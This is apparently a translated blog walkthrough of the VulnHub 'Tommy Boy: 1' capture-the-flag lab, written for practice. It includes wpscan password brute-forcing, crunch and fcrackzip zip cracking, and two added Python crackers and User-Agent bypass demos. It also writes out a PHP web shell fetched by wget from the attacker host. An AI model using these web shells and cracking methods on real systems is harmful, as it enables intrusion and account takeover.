No.38 VulnHub Tommy Boy: 1 Walkthrough (penetration practice)


Target address: https://www.vulnhub.com/entry/tommy-boy-1,157/
Target difficulty: Intermediate (CTF)
Target release date: July 27, 2016
Target description:
Holy Schnikes! Tommy Boy needs your help!
The Callahan Auto company has finally entered the age of modern technology and set up a web server so its customers can order brake pads.
Unfortunately, the site has just crashed, and the only person with administrator credentials is Tom Callahan Sr., who just died! Worse, the only person who understood the server has quit!
You need to help Tom Jr., Richard and Michelle get the page back up; otherwise Callahan Auto will surely go out of business :-( (Google Translation)
Goal: find the six flags
Author: Dayu
Date: 2020-02-01
Note: For all of these machines, I run the downloaded VM in VMware. I use a Kali Linux machine as the attacker. The techniques used to solve this CTF are for learning and educational purposes only; if they are used for any other goal, I am not responsible.

I. Information gathering

We need to find the target VM's IP address; nmap is used to locate it:
The CTF target is at 192.168.182.140.
The nmap port scan shows 22, 80 and 8008 open... (the default scan covers only the top 1000 ports; a later full-range scan, nmap -p-, turns up one more service, the FTP server on 65534).
Browsing port 80 shows the Callahan Auto! page...
Visiting robots.txt directly reveals the first flag...
Flag1: B34rcl4ws ...
A jpg file is also listed there... let's look at it.
It contains nothing useful... back to the port 80 page: its source contains a video embedded earlier on the page, let's look at it...
At the 3-second mark the video gives us a hint... prehistoricforest ...
This is the blog... FLAG2 is found here.
thisisthesecondflagyayyou.txt ... The site above is a WordPress blog (CMS), so it can be scanned directly with wpscan...
Flag2: Z4l1nsky, easy to find...
A post from July 2016 also reveals the /richard directory...
It contains a hash, ce154b5a8e59c89732bc25d6a2e6b90b; let's crack it...
The password is spanky.
Browsing the blog further, there is a password-protected post... try the password recovered from the MD5 hash above...
The post explains:
1. The Callahan Auto website can be restored from the backup file callahanbak.bak in Big Tom's home directory...
2. To do that you first need to get into Big Tom's account, but Big Tom always forgets his password; as mentioned earlier, the second half of his SSH password is saved in a draft blog post...
3. Nick's FTP server and other information are also mentioned, but the FTP server is not always online (it runs for 15 minutes, then goes down for 15 minutes, and cycles)...
4. Nick reset the FTP account "nickburns" with an easy-to-guess password, and his SSH account has been deleted...
FTP is mentioned here, so let's try to log in...
A full-port nmap scan finds the FTP port at 65534 (remember the 15-minute on/off cycle: if the port shows closed, wait and scan again)... connecting with nickburns as both username and password works... and the readme.txt file on the server says:
1. There is a sub-folder on the server named NickIzL33t, for Nick's personal use...
2. Nick created an encrypted zip file to store Big Tom's credentials...
3. Nick left a hint for the password needed to extract that encrypted zip...
Sure enough, port 8008 is Nick's server...
It says only Steve Jobs may view it... the content can be viewed directly by changing the User-Agent (through an intercepting proxy or a browser user-agent add-on)...
I won't install one here... search for: Firefox user agent plugin
Set the iPhone 3 user agent and revisit... (as mentioned, only "Steve Jobs" can visit, i.e. the server only checks the client-supplied User-Agent header)
There are hidden html pages on this side; two ways to find them are wfuzz and dirbuster, continue...
Here I use dirbuster...
Select the iPhone user agent in its options...
Fill in the target address, wordlist, directory brute-force, and the html extension... it takes a few minutes to run...
Hidden html found: http://192.168.182.140:8008/NickIzL33t/fallon1.html, visit it...
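The User-Agent check on port 8008, modelled as an added example (this is not code from the original walkthrough or from the Tommy Boy VM; the page does not show how the real 8008 server checks the header, so the model assumes a plain "iPhone" substring match, and the page bodies and candidate paths are constructed for the demo). A tiny loopback server gates on the header the way the box does, the client spoofs it, and the dirbuster step is then repeated with the spoofed UA; the point is that a header the client chooses is not an access control:

```python
"""Added example: loopback model of a User-Agent gated site and its bypass."""
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List, Tuple

# Any UA string containing "iPhone" passes the (assumed) check.
IPHONE_UA = "Mozilla/5.0 (iPhone; CPU iPhone OS 3_0 like Mac OS X)"

# Constructed page content standing in for the NickIzL33t site.
PAGES: Dict[str, str] = {
    "/NickIzL33t/": "<html>Nick's stuff. Only Steve Jobs may enter.</html>",
    "/NickIzL33t/fallon1.html": "<html>three hints live here</html>",
}


def gate(path: str, user_agent: str) -> Tuple[int, str]:
    """Server-side decision: 403 unless the UA claims to be an iPhone,
    404 for unknown paths, 200 with the page body otherwise."""
    if "iPhone" not in user_agent:
        return 403, "This page is for Steve Jobs only."
    if path not in PAGES:
        return 404, "not found"
    return 200, PAGES[path]


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = gate(self.path, self.headers.get("User-Agent", ""))
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def fetch(url: str, user_agent: str) -> int:
    """Client side: HTTP status for url when sending the given User-Agent."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe(base: str, paths: List[str], user_agent: str) -> List[Tuple[str, int]]:
    """The dirbuster step with the spoofed UA: which candidate paths exist?"""
    return [(p, fetch(base + p, user_agent)) for p in paths]


if __name__ == "__main__":
    srv = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % srv.server_address[1]
    print("default UA :", fetch(base + "/NickIzL33t/", "curl/8.0"))  # 403
    print("iPhone UA  :", fetch(base + "/NickIzL33t/", IPHONE_UA))    # 200
    wordlist = ["/NickIzL33t/index.html",        # constructed candidates
                "/NickIzL33t/fallon1.html",
                "/NickIzL33t/admin.html"]
    for path, code in probe(base, wordlist, IPHONE_UA):
        print(code, path)
    srv.shutdown()
```

Without the spoofed header every request, including the brute-force, comes back 403, which is why dirbuster has to be given the iPhone User-Agent in its options before it can find fallon1.html.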
There are three hints on it; I'll go through the information one by one...
The first hint leads to Big Tom's encrypted password backup file...
Flag3: TinyHead
The third flag... download the flag locally, and from the third hint download the .zip locally as well...
Next, brute-force the archive using the hint under the third item...
Hint: bev[A-Z][0-9][0-9][a-z][a-z][symbol]1995
I use crunch to generate a dictionary from the given pattern... (crunch tutorial link)
Command: crunch 13 13 -t bev,%%@@^1995 -o passlist_tomboy.txt
(13 characters in total; in crunch's -t syntax "," is an uppercase letter, "%" a digit, "@" a lowercase letter and "^" a symbol.) That is 58 million combinations, generated in about 10 seconds... fast hardware...
Then feed the generated dictionary to fcrackzip together with the encrypted zip...
Command: fcrackzip -v -D -u -p dayu1.txt t0msp4ssw0rdz.zip (this took more than two minutes; -D is dictionary mode, and -u verifies each candidate by actually unzipping, which avoids the false positives of the cheap header check)
Password: bevH00tr$1995, decompress...
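The two offline attacks in this box, the MD5 hash from the /richard directory and the crunch mask for t0msp4ssw0rdz.zip, as one added Python example (not code from the original walkthrough; it uses only the standard library). Assumptions: crunch's default character classes for the -t placeholders (33 symbols including space, which is what gives the 58,000,800 count), and a constructed mini wordlist for the hash; pass the path of a real ZipCrypto archive as the first argument to run the zip attack:

```python
"""Added example: crunch-style mask generation plus a generic cracker with
MD5 and zip checkers (standard library only)."""
import hashlib
import itertools
import string
import sys
import zipfile
from typing import Callable, Dict, Iterable, Iterator, Optional

# Assumption: crunch's default classes for -t placeholders.
# ',' upper, '%' digit, '@' lower, '^' symbol (33 symbols including space).
CRUNCH_CLASSES: Dict[str, str] = {
    ",": string.ascii_uppercase,
    "%": string.digits,
    "@": string.ascii_lowercase,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",
}


def mask_candidates(mask: str, classes: Dict[str, str] = CRUNCH_CLASSES) -> Iterator[str]:
    """Yield every string matching a crunch-style mask, rightmost position
    changing fastest (same order as `crunch 13 13 -t bev,%%@@^1995`).
    Characters that are not placeholders are literals."""
    slots = [classes.get(ch, ch) for ch in mask]
    for combo in itertools.product(*slots):
        yield "".join(combo)


def mask_size(mask: str, classes: Dict[str, str] = CRUNCH_CLASSES) -> int:
    """Number of candidates the mask expands to (how big the wordlist is)."""
    n = 1
    for ch in mask:
        n *= len(classes.get(ch, ch))
    return n


def matches_mask(candidate: str, mask: str, classes: Dict[str, str] = CRUNCH_CLASSES) -> bool:
    """True if candidate is inside the mask's keyspace (sanity check for a hint)."""
    return len(candidate) == len(mask) and all(
        c in classes.get(m, m) for c, m in zip(candidate, mask))


def md5hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def crack(candidates: Iterable[str], check: Callable[[str], bool]) -> Optional[str]:
    """Return the first candidate the checker accepts, or None."""
    for pw in candidates:
        if check(pw):
            return pw
    return None


def md5_check(target_hex: str) -> Callable[[str], bool]:
    """Checker for an unsalted MD5 like the one found under /richard."""
    target = target_hex.lower()
    return lambda pw: md5hex(pw) == target


def zip_check(path: str) -> Callable[[str], bool]:
    """Like fcrackzip -u: a password only counts if the archive really decrypts.
    ZipCrypto's 1-byte header test lets ~1/256 wrong passwords through, so
    read the whole first member and let zipfile verify the CRC."""
    zf = zipfile.ZipFile(path)
    name = zf.namelist()[0]

    def check(pw: str) -> bool:
        try:
            zf.read(name, pwd=pw.encode())
            return True
        except (RuntimeError, zipfile.BadZipFile):
            return False
    return check


if __name__ == "__main__":
    # Richard's hash from the blog; the walkthrough reports it cracks to "spanky".
    words = ["password", "richard", "spanky", "callahan"]  # constructed wordlist
    print(crack(words, md5_check("ce154b5a8e59c89732bc25d6a2e6b90b")))
    mask = "bev,%%@@^1995"
    print(mask_size(mask), "candidates in the mask")
    if len(sys.argv) > 1:  # python3 this.py t0msp4ssw0rdz.zip
        print(crack(mask_candidates(mask), zip_check(sys.argv[1])))
```

The zip checker reads the whole member instead of trusting ZipCrypto's one-byte header test, which is the same reason to pass -u to fcrackzip; expect pure Python to be much slower than fcrackzip over the full 58-million keyspace, so narrow the mask with whatever else the hint gives you before running it.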
The unpacked text contains three usernames and passwords... plus an important hint: fatguyinalittlecoat
It says there are some numbers after it... so next, look at the blog to find the rest...
We already know this is a WordPress blog; enumerate its users with wpscan...
Command: wpscan -u http://192.168.182.140/prehistoricforest/ --enumerate u
Command: wpscan -u http://192.168.182.140/prehistoricforest --wordlist /usr/share/wordlists/rockyou.txt --username tom --threads 50
(this is the wpscan 2.x syntax; wpscan 3 uses --url, --passwords and --usernames instead)
Password: tomtom1
Sure enough, an e-mail is found in Drafts, matching the earlier explanation... (this took 1 hour)
User: bigtommysenior Password: fatguyinalittlecoat1938!!
flag4: EditButton
Got flag4... the home directory also holds the protected LOOT.ZIP and the website backup file...
The key task is to restore the Callahan Auto website...
Command: cp callahanbak.bak /var/www/html/index.html
The Callahan Auto website is back online... open it to check...
With that done, I have to escalate privileges...
/.5.txt is owned by www-data... so a shell running as the web server user is needed to read it...
Because the back-end web server is Apache...
Find a directory to upload the file to... it is the one next to the .zip directory...
http://192.168.182.140:8008/NickIzL33t//P4TCH_4D4MS/
Set up a simple shell to read it...

<?php system($_GET['cmd']); ?>

Command: wget http://192.168.182.149:5555/dayushell.php -O sh.php
(the shell is fetched from 192.168.182.149:5555, a simple web server on the attacking host, and saved as sh.php)
After uploading, commands can be executed through the cmd parameter on the web...
Of course, uploading a reverse shell of the same kind would also give a shell on the box...
Visit: http://192.168.182.140:8008/NickIzL33t//P4TCH_4D4MS/uploads/sh.php?cmd=cat%20/.5.txt
flag5: Buttcrack
It was said that concatenating flags 1~5 gives the password to extract loot.zip...
We already know there is a still-unopened LOOT.ZIP under the bigtommysenior user...
flag1: B34rcl4ws
flag2: Z4l1nsky
flag3: TinyHead
flag4: EditButton
flag5: Buttcrack
Password: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
All found...

This post has only one section, information gathering... because the whole path is guided by the author's e-mails and blog posts, the entire walkthrough comes down to information gathering...
The place to get stuck is having to use an iPhone user agent to access the site... keep at it!

Since we have successfully found all six flags, this simple box is done. I hope you enjoyed this machine; stay tuned, Dayu will have more challenging machines later, so let's practice and learn together.

If you have other methods, feel free to leave a comment. If I have written something wrong, please do tell me. If you think this post is decent, feel free to share it with people around you.

Source: blog.csdn.net/qq_34801745/article/details/104124940